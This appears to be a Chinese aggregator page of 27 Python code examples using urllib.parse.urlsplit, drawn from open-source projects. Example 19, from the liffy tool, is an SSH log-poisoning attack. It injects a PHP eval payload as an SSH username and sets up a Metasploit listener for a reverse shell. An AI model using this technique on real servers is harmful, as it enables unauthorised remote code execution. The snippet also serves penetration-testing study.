Python parse.urlsplit方法代码示例

本文整理汇总了Python中urllib.parse.urlsplit方法的典型用法代码示例。如果您正苦于以下问题:Python parse.urlsplit方法的具体用法?Python parse.urlsplit怎么用?Python parse.urlsplit使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在模块urllib.parse的用法示例。

在下文中一共展示了parse.urlsplit方法的27个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: extract_url_path_and_query

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def extract_url_path_and_query(full_url=None, no_query=False):
    """
    Convert http://foo.bar.com/aaa/p.html?x=y to /aaa/p.html?x=y
    :param no_query:
    :type full_url: str
    :param full_url: full url
    :return: str
    """
    if full_url is None:
        full_url = request.url
    split = urlsplit(full_url)
    result = split.path or "/"
    if not no_query and split.query:
        result += '?' + split.query
    return result
# ################# End Client Request Handler #################
# ################# Begin Middle Functions ################# 
开发者ID:aploium,项目名称:zmirror,代码行数:24,代码来源:zmirror.py


示例2: _detect_http_redirection

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def _detect_http_redirection(http_response: HTTPResponse, server_host_name: str, server_port: int) -> Optional[str]:
    """If the HTTP response contains a redirection to the same server, return the path to the new location.
    """
    next_location_path = None
    if 300 <= http_response.status < 400:
        location_header = _extract_first_header_value(http_response, "Location")
        if location_header:
            parsed_location = urlsplit(location_header)
            is_relative_url = False if parsed_location.hostname else True
            if is_relative_url:
                # Yes, to a relative URL; follow the redirection
                next_location_path = location_header
            else:
                is_absolute_url_to_same_hostname = parsed_location.hostname == server_host_name
                absolute_url_port = 443 if parsed_location.port is None else parsed_location.port
                is_absolute_url_to_same_port = absolute_url_port == server_port
                if is_absolute_url_to_same_hostname and is_absolute_url_to_same_port:
                    # Yes, to an absolute URL to the same server; follow the redirection
                    next_location_path = f"{parsed_location.path}"
                    if parsed_location.query:
                        next_location_path += f"?{parsed_location.query}"
    return next_location_path 
开发者ID:nabla-c0d3,项目名称:sslyze,代码行数:25,代码来源:http_headers_plugin.py


示例3: delete

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def delete(url):
        url = unquote(url)
        match, project = Cache.match(url)
        if match:
            path = Cache.path(url, project, include_file=True)
            # Rather then wait for last updated statistics to expire, remove the
            # project cache if applicable.
            if project:
                apiurl, _ = Cache.spliturl(url)
                if project.isdigit():
                    # Clear target project cache upon request acceptance.
                    project = osc.core.get_request(apiurl, project).actions[0].tgt_project
                Cache.delete_project(apiurl, project)
            if os.path.exists(path):
                if conf.config['debug']: print('CACHE_DELETE', url, file=sys.stderr)
                os.remove(path)
        # Also delete version without query. This does not handle other
        # variations using different query strings. Handy for PUT with ?force=1.
        o = urlsplit(url)
        if o.query != '':
            url_plain = SplitResult(o.scheme, o.netloc, o.path, '', o.fragment).geturl()
            Cache.delete(url_plain) 
开发者ID:openSUSE,项目名称:openSUSE-release-tools,代码行数:27,代码来源:cache.py


示例4: path

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def path(url, project, include_file=False, makedirs=False):
        if not Cache.CACHE_DIR:
            raise Exception('Cache.init() must be called first')
        parts = [Cache.CACHE_DIR]
        o = urlsplit(url)
        parts.append(o.hostname)
        if project:
            parts.append(project)
        directory = os.path.join(*parts)
        if not os.path.exists(directory) and makedirs:
            os.makedirs(directory)
        if include_file:
            parts.append(hashlib.sha1(url.encode('utf-8')).hexdigest())
            return os.path.join(*parts)
        return directory 
开发者ID:openSUSE,项目名称:openSUSE-release-tools,代码行数:23,代码来源:cache.py


示例5: handle_incident

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def handle_incident(self, icd):
        url = icd.get("url")
        if isinstance(url, bytes):
            try:
                url = url.decode(encoding="utf-8")
            except UnicodeEncodeError as e:
                logger.warning("Error decoding URL %s", url, exc_info=True)
                return
        if url.startswith('tftp://'):
            # python fails parsing tftp://, ftp:// works, so ...
            logger.info("do download")
            x = parse.urlsplit(url[1:])
            if x.netloc == '0.0.0.0':
                logger.info("Discarding download from INADDR_ANY")
                return
            try:
                con = icd.con
            except AttributeError:
                con = None
            t=TftpClient()
            t.download(con, x.netloc, 69, x.path[1:], url) 
开发者ID:DinoTools,项目名称:dionaea,代码行数:24,代码来源:tftp.py


示例6: unshorten

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def unshorten(self, uri, type=None):
        domain = urlsplit(uri).netloc
        if not domain:
            return uri, "No domain found in URI!"
        had_google_outbound, uri = self._clear_google_outbound_proxy(uri)
        if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly':
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == 'adfocus':
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks':
            return self._unshorten_linkbucks(uri)
        if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu':
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)
        if re.search(self._hrefli_regex, domain, re.IGNORECASE):
            return self._unshorten_hrefli(uri)
        if re.search(self._anonymz_regex, domain, re.IGNORECASE):
            return self._unshorten_anonymz(uri)
        return uri, 200 
开发者ID:bugatsinho,项目名称:bugatsinho.github.io,代码行数:27,代码来源:base.py


示例7: transform_url

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def transform_url(url, qparams=None, **kwargs):
    """ Modify url
    :param url: url to transform (can be relative)
    :param qparams: additional query params to add to end of url
    :param kwargs: pieces of URL to modify - e.g. netloc=localhost:8000
    :return: Modified URL
    .. versionadded:: 3.2.0
    """
    if not url:
        return url
    link_parse = urlsplit(url)
    if qparams:
        current_query = dict(parse_qsl(link_parse.query))
        current_query.update(qparams)
        link_parse = link_parse._replace(query=urlencode(current_query))
    return urlunsplit(link_parse._replace(**kwargs)) 
开发者ID:Flask-Middleware,项目名称:flask-security,代码行数:20,代码来源:utils.py


示例8: test_spa_get

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_spa_get(app, client):
    """
    Test 'single-page-application' style redirects
    This uses json only.
    """
    with capture_flashes() as flashes:
        with capture_passwordless_login_requests() as requests:
            response = client.post(
                "/login",
                json=dict(email="matt@lp.com"),
                headers={"Content-Type": "application/json"},
            )
            assert response.headers["Content-Type"] == "application/json"
        token = requests[0]["login_token"]
        response = client.get("/login/" + token)
        assert response.status_code == 302
        split = urlsplit(response.headers["Location"])
        assert "localhost:8081" == split.netloc
        assert "/login-redirect" == split.path
        qparams = dict(parse_qsl(split.query))
        assert qparams["email"] == "matt@lp.com"
    assert len(flashes) == 0 
开发者ID:Flask-Middleware,项目名称:flask-security,代码行数:25,代码来源:test_passwordless.py


示例9: test_tf_link_spa

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_tf_link_spa(app, client, get_message):
    # Verify two-factor required when using magic link and SPA
    # This currently isn't supported and should redirect to an error.
    with app.mail.record_messages() as outbox:
        response = client.post(
            "/us-signin/send-code",
            data=dict(identity="matt@lp.com", chosen_method="email"),
            follow_redirects=True,
        )
        assert response.status_code == 200
        assert b"Sign In" in response.data
    matcher = re.match(
        r".*(http://[^\s*]*).*", outbox[0].body, re.IGNORECASE | re.DOTALL
    )
    magic_link = matcher.group(1)
    response = client.get(magic_link, follow_redirects=False)
    split = urlsplit(response.location)
    assert "localhost:8081" == split.netloc
    assert "/login-error" == split.path
    qparams = dict(parse_qsl(split.query))
    assert qparams["tf_required"] == "1"
    assert qparams["email"] == "matt@lp.com" 
开发者ID:Flask-Middleware,项目名称:flask-security,代码行数:25,代码来源:test_unified_signin.py


示例10: test_spa_get

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_spa_get(app, client):
    """
    Test 'single-page-application' style redirects
    This uses json only.
    """
    with capture_flashes() as flashes:
        with capture_registrations() as registrations:
            response = client.post(
                "/register",
                json=dict(email="dude@lp.com", password="awesome sunset"),
                headers={"Content-Type": "application/json"},
            )
            assert response.headers["Content-Type"] == "application/json"
        token = registrations[0]["confirm_token"]
        response = client.get("/confirm/" + token)
        assert response.status_code == 302
        split = urlsplit(response.headers["Location"])
        assert "localhost:8081" == split.netloc
        assert "/confirm-redirect" == split.path
        qparams = dict(parse_qsl(split.query))
        assert qparams["email"] == "dude@lp.com"
    # Arguably for json we shouldn't have any - this is buried in register_user
    # but really shouldn't be.
    assert len(flashes) == 1 
开发者ID:Flask-Middleware,项目名称:flask-security,代码行数:27,代码来源:test_confirmable.py


示例11: _rewrite_url

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def _rewrite_url(self, request):
        with self._lock:
            rewrite_rules = self._rewrite_rules[:]
        original_netloc = urlsplit(request.path).netloc
        for pattern, replacement in rewrite_rules:
            modified, count = pattern.subn(replacement, request.path)
            if count > 0:
                request.path = modified
                break
        modified_netloc = urlsplit(request.path).netloc
        if original_netloc != modified_netloc:
            # Modify the Host header if it exists
            if 'Host' in request.headers:
                request.headers['Host'] = modified_netloc 
开发者ID:wkeeling,项目名称:selenium-wire,代码行数:21,代码来源:modifier.py


示例12: filename

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def filename(self):
        '''Returns the filename to be used for saving the repo file.
        The filename is derived from the repo url by injecting a suffix
        after the name and before the file extension. This suffix is a
        partial md5 checksum of the full repourl. This avoids multiple
        repos from being written to the same file.
        '''
        urlpath = unquote(urlsplit(self.repourl, allow_fragments=False).path)
        basename = os.path.basename(urlpath)
        if not basename.endswith(REPO_SUFFIX):
            basename += REPO_SUFFIX
        if self.add_hash:
            suffix = '-' + md5(self.repourl.encode('utf-8')).hexdigest()[:5]  # nosec
        else:
            suffix = ''
        final_name = suffix.join(os.path.splitext(basename))
        return final_name 
开发者ID:containerbuildsystem,项目名称:atomic-reactor,代码行数:20,代码来源:yum.py


示例13: build_absolute_uri

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def build_absolute_uri(self, location=None):
        """
        Build an absolute URI from the location and the variables available in
        this request. If no ``location`` is specified, bulid the absolute URI
        using request.get_full_path(). If the location is absolute, convert it
        to an RFC 3987 compliant URI and return it. If location is relative or
        is scheme-relative (i.e., ``//example.com/``), urljoin() it to a base
        URL constructed from the request variables.
        """
        if location is None:
            # Make it an absolute url (but schemeless and domainless) for the
            # edge case that the path starts with '//'.
            location = '//%s' % self.get_full_path()
        bits = urlsplit(location)
        if not (bits.scheme and bits.netloc):
            current_uri = '{scheme}://{host}{path}'.format(scheme=self.scheme,
                                                           host=self.get_host(),
                                                           path=self.path)
            # Join the constructed URL with the provided location, which will
            # allow the provided ``location`` to apply query strings to the
            # base path as well as override the host, if it begins with //
            location = urljoin(current_uri, location)
        return iri_to_uri(location) 
开发者ID:reBiocoder,项目名称:bioforum,代码行数:25,代码来源:request.py


示例14: translate_url

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def translate_url(url, lang_code):
    """
    Given a URL (absolute or relative), try to get its translated version in
    the `lang_code` language (either by i18n_patterns or by translated regex).
    Return the original URL if no translated version is found.
    """
    parsed = urlsplit(url)
    try:
        match = resolve(parsed.path)
    except Resolver404:
        pass
    else:
        to_be_reversed = "%s:%s" % (match.namespace, match.url_name) if match.namespace else match.url_name
        with override(lang_code):
            try:
                url = reverse(to_be_reversed, args=match.args, kwargs=match.kwargs)
            except NoReverseMatch:
                pass
            else:
                url = urlunsplit((parsed.scheme, parsed.netloc, url, parsed.query, parsed.fragment))
    return url 
开发者ID:reBiocoder,项目名称:bioforum,代码行数:23,代码来源:base.py


示例15: stored_name

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def stored_name(self, name):
        parsed_name = urlsplit(unquote(name))
        clean_name = parsed_name.path.strip()
        hash_key = self.hash_key(clean_name)
        cache_name = self.hashed_files.get(hash_key)
        if cache_name is None:
            if self.manifest_strict:
                raise ValueError("Missing staticfiles manifest entry for '%s'" % clean_name)
            cache_name = self.clean_name(self.hashed_name(name))
        unparsed_name = list(parsed_name)
        unparsed_name[2] = cache_name
        # Special casing for a @font-face hack, like url(myfont.eot?#iefix")
        # http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
        if '?#' in name and not unparsed_name[3]:
            unparsed_name[2] += '?'
        return urlunsplit(unparsed_name) 
开发者ID:reBiocoder,项目名称:bioforum,代码行数:18,代码来源:storage.py


示例16: _strip_signing_parameters

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def _strip_signing_parameters(self, url):
        """ Duplicated Unsiged URLs from Django-Stroage
        Method from: https://github.com/jschneier/django-storages/blob/master/storages/backends/s3boto3.py
        Boto3 does not currently support generating URLs that are unsigned. Instead we
        take the signed URLs and strip any querystring params related to signing and expiration.
        Note that this may end up with URLs that are still invalid, especially if params are
        passed in that only work with signed URLs, e.g. response header params.
        The code attempts to strip all query parameters that match names of known parameters
        from v2 and v4 signatures, regardless of the actual signature version used.
        """
        split_url = urlsplit(url)
        qs = parse_qsl(split_url.query, keep_blank_values=True)
        blacklist = {
            'x-amz-algorithm', 'x-amz-credential', 'x-amz-date',
            'x-amz-expires', 'x-amz-signedheaders', 'x-amz-signature',
            'x-amz-security-token', 'awsaccesskeyid', 'expires', 'signature',
        }
        filtered_qs = ((key, val) for key, val in qs if key.lower() not in blacklist)
        # Note: Parameters that did not have a value in the original query string will have
        # an '=' sign appended to it, e.g ?foo&bar becomes ?foo=&bar=
        joined_qs = ('='.join(keyval) for keyval in filtered_qs)
        split_url = split_url._replace(query="&".join(joined_qs))
        return split_url.geturl() 
开发者ID:OasisLMF,项目名称:OasisPlatform,代码行数:27,代码来源:storage_manager.py


示例17: upload

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def upload(url, filename=None):
    from urllib.request import Request, urlopen
    from urllib.parse import urlsplit
    import shutil
    def getFilename(url,openUrl):
        if 'Content-Disposition' in openUrl.info():
            # If the response has Content-Disposition, try to get filename from it
            cd = dict([x.strip().split('=') if '=' in x else (x.strip(),'')
                                        for x in openUrl.info().split(';')])
            if 'filename' in cd:
                fname = cd['filename'].strip("\"'")
                if fname: return fname
        # if no filename was found above, parse it out of the final URL.
        return os.path.basename(urlsplit(openUrl.url)[2])
    r = urlopen(Request(url))
    success = None
    try:
        filename = filename or "/tmp/%s" % getFilename(url,r)
        with open(filename, 'wb') as f:
            shutil.copyfileobj(r,f)
        success = filename
    finally:
        r.close()
    return success 
开发者ID:GenealogyCollective,项目名称:gprime,代码行数:26,代码来源:actionform.py


示例18: embed_real_url_to_embedded_url

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def embed_real_url_to_embedded_url(real_url_raw, url_mime, escape_slash=False):
    """
    将url的参数(?q=some&foo=bar)编码到url路径中, 并在url末添加一个文件扩展名
    在某些对url参数支持不好的CDN中, 可以减少错误
    `cdn_redirect_encode_query_str_into_url`设置依赖于本函数, 详细说明可以看配置文件中的对应部分
    解码由 extract_real_url_from_embedded_url() 函数进行, 对应的例子也请看这个函数
    :rtype: str
    """
    # dbgprint(real_url_raw, url_mime, escape_slash)
    if escape_slash:
        real_url = real_url_raw.replace(r'\/', '/')
    else:
        real_url = real_url_raw
    url_sp = urlsplit(real_url)
    if not url_sp.query:  # no query, needn't rewrite
        return real_url_raw
    byte_query = url_sp.query.encode()
    if len(byte_query) > 128:  # 当查询参数太长时, 进行gzip压缩
        gzip_label = 'z'  # 进行压缩后的参数, 会在标识区中添加一个z
        byte_query = zlib.compress(byte_query)
    else:
        gzip_label = ''
    b64_query = base64.urlsafe_b64encode(byte_query).decode()
    # dbgprint(url_mime)
    mixed_path = url_sp.path + '_' + _url_salt + gzip_label + '_.' \
                 + b64_query \
                 + '._' + _url_salt + '_.' + mime_to_use_cdn[url_mime]
    result = urlunsplit((url_sp.scheme, url_sp.netloc, mixed_path, '', ''))
    if escape_slash:
        result = s_esc(result)
        # dbgprint('embed:', real_url_raw, 'to:', result)
    return result 
开发者ID:aploium,项目名称:zmirror,代码行数:37,代码来源:utils.py


示例19: execute_ssh

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def execute_ssh(self):
        lhost, lport, shell = msf_payload()
        handle = listener(lhost, lport)
        handle.handler()
        with open('/tmp/{0}.php'.format(shell), 'r') as f:
            payload_stage2 = parse.quote(f.read())
        payload = "<?php eval(\\$_GET['code'])?>"
        print(colors("[~] Start SSH Log Poisoning ...", 93))
        host = parse.urlsplit(self.target).netloc
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
        print(colors("[~] Executing Shell!",93))
        """ Attempt traverse """
        self.location = self.location + '&code={0}'.format(payload_stage2)
        if self.cookies:
            f_cookies = cook(self.cookies)
            attack(self.target, self.location, cookies=f_cookies)
        else:
            attack(self.target, self.location) 
开发者ID:mzfr,项目名称:liffy,代码行数:28,代码来源:sshlog.py


示例20: test_adds_other_supplied_values_as_query_string

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_adds_other_supplied_values_as_query_string(app):
    @app.route(COMPLEX_PARAM_URL)
    def passes(request):
        return text("this should pass")
    new_kwargs = dict(PASSING_KWARGS)
    new_kwargs["added_value_one"] = "one"
    new_kwargs["added_value_two"] = "two"
    url = app.url_for("passes", **new_kwargs)
    query = dict(parse_qsl(urlsplit(url).query))
    assert query["added_value_one"] == "one"
    assert query["added_value_two"] == "two" 
开发者ID:huge-success,项目名称:sanic,代码行数:17,代码来源:test_url_building.py


示例21: test_get_ac_no_trait_bogus_group_policy_custom_limit

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_get_ac_no_trait_bogus_group_policy_custom_limit(self):
        CONF.set_override('max_placement_results', 42, group='scheduler')
        resp_mock = mock.Mock(status_code=200)
        json_data = {
            'allocation_requests': mock.sentinel.alloc_reqs,
            'provider_summaries': mock.sentinel.p_sums,
        }
        resources = scheduler_utils.ResourceRequest.from_extra_specs({
            'resources:VCPU': '1',
            'resources:MEMORY_MB': '1024',
            'resources1:DISK_GB': '30',
            'group_policy': 'bogus',
        })
        expected_path = '/allocation_candidates'
        expected_query = [
            ('limit', '42'),
            ('resources', 'MEMORY_MB:1024,VCPU:1'),
            ('resources1', 'DISK_GB:30'),
        ]
        resp_mock.json.return_value = json_data
        self.ks_adap_mock.get.return_value = resp_mock
        alloc_reqs, p_sums, allocation_request_version = (
            self.client.get_allocation_candidates(self.context, resources))
        url = self.ks_adap_mock.get.call_args[0][0]
        split_url = parse.urlsplit(url)
        query = parse.parse_qsl(split_url.query)
        self.assertEqual(expected_path, split_url.path)
        self.assertEqual(expected_query, query)
        expected_url = '/allocation_candidates?%s' % parse.urlencode(
            expected_query)
        self.assertEqual(mock.sentinel.alloc_reqs, alloc_reqs)
        self.ks_adap_mock.get.assert_called_once_with(
            expected_url, microversion='1.31', endpoint_filter=mock.ANY,
            logger=mock.ANY,
            headers={'X-Openstack-Request-Id': self.context.global_id})
        self.assertEqual(mock.sentinel.p_sums, p_sums) 
开发者ID:openstack,项目名称:zun,代码行数:41,代码来源:test_report.py


示例22: test_get_allocation_candidates_not_found

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def test_get_allocation_candidates_not_found(self):
        # Ensure _get_resource_provider() just returns None when the placement
        # API doesn't find a resource provider matching a UUID
        resp_mock = mock.Mock(status_code=404)
        self.ks_adap_mock.get.return_value = resp_mock
        expected_path = '/allocation_candidates'
        expected_query = {'resources': ['MEMORY_MB:1024'],
                          'limit': ['100']}
        # Make sure we're also honoring the configured limit
        CONF.set_override('max_placement_results', 100, group='scheduler')
        resources = scheduler_utils.ResourceRequest.from_extra_specs(
            {'resources:MEMORY_MB': '1024'})
        res = self.client.get_allocation_candidates(self.context, resources)
        self.ks_adap_mock.get.assert_called_once_with(
            mock.ANY, microversion='1.31', endpoint_filter=mock.ANY,
            logger=mock.ANY,
            headers={'X-Openstack-Request-Id': self.context.global_id})
        url = self.ks_adap_mock.get.call_args[0][0]
        split_url = parse.urlsplit(url)
        query = parse.parse_qs(split_url.query)
        self.assertEqual(expected_path, split_url.path)
        self.assertEqual(expected_query, query)
        self.assertIsNone(res[0]) 
开发者ID:openstack,项目名称:zun,代码行数:29,代码来源:test_report.py


示例23: _update_metadata

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def _update_metadata(self, metadata):
        self.server_host_name = metadata['server_host']
        splunkd = urlparse.urlsplit(metadata['server_uri'])
        self.server_uri = splunkd.geturl()
        self.server_scheme = splunkd.scheme
        self.server_host = splunkd.hostname
        self.server_port = splunkd.port
        self.session_key = metadata['session_key']
        self._checkpoint_dir = metadata['checkpoint_dir'] 
开发者ID:remg427,项目名称:misp42splunk,代码行数:11,代码来源:modular_input.py


示例24: urldefrag

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def urldefrag(url):
    if "#" in url:
        s, n, p, q, frag = urlsplit(url)
        defrag = urlunsplit((s, n, p, q, ''))
    else:
        defrag = url
        frag = ''
    return defrag, frag 
开发者ID:remg427,项目名称:misp42splunk,代码行数:10,代码来源:__init__.py


示例25: _path_to_bucket_and_key

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def _path_to_bucket_and_key(path):
        (scheme, netloc, path, query, fragment) = urlsplit(path,
                                                           allow_fragments=False)
        question_mark_plus_query = '?' + query if query else ''
        path_without_initial_slash = path[1:] + question_mark_plus_query
        return netloc, path_without_initial_slash 
开发者ID:d6t,项目名称:d6tpipe,代码行数:8,代码来源:s3.py


示例26: make_storage_from_hdi_core_info

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def make_storage_from_hdi_core_info(self, hdi_core_info):
        if not hdi_core_info.get('fs.defaultFS', None):
            raise Exception('hdi_core_info does not contain default FS or is not correct {}'.format(hdi_core_info))
        default_fs = hdi_core_info['fs.defaultFS']
        rsp = urlsplit(default_fs)
        #TODO: put a real storage representation one day...
        if rsp.scheme == 'wasb':
            blob_fqdn = rsp.hostname
            logging.info('Detected default wasb storage {}'.format(blob_fqdn))
        else:
            raise ValueError('Detected unsupported storage type: {}'.format(rsp.scheme))
        #Adding default keyprovider to Simple type, if not ShellProvider will be used on workers and generate errors
        wasb_encrypt_key_provider = self.WASB_ENCRYPT_KEY_PROVIDER_META.format(blob_fqdn=blob_fqdn)
        hdi_core_info[wasb_encrypt_key_provider] = 'org.apache.hadoop.fs.azure.SimpleKeyProvider'
        spark_conf = {}
        for k in hdi_core_info.keys():
            spark_conf['spark.hadoop.{storage_key}'.format(storage_key=k)] = hdi_core_info[k]
        return {'hadoop': hdi_core_info,
                #Need to duplicate WASB storage config in Hive if not it will not be seen by HProxy
                'hive': hdi_core_info,
                'spark': spark_conf}
    #TODO: this is probably to be overwritten when templates change, keep it here for now 
开发者ID:dataiku,项目名称:dataiku-contrib,代码行数:30,代码来源:models.py


示例27: spliturl

# 需要导入模块: from urllib import parse [as 别名]
# 或者: from urllib.parse import urlsplit [as 别名]
def spliturl(url):
        o = urlsplit(url)
        apiurl = SplitResult(o.scheme, o.netloc, '', '', '').geturl()
        path = SplitResult('', '', o.path, o.query, '').geturl()
        return (apiurl, path) 
开发者ID:openSUSE,项目名称:openSUSE-release-tools,代码行数:7,代码来源:cache.py



注:本文中的urllib.parse.urlsplit方法示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。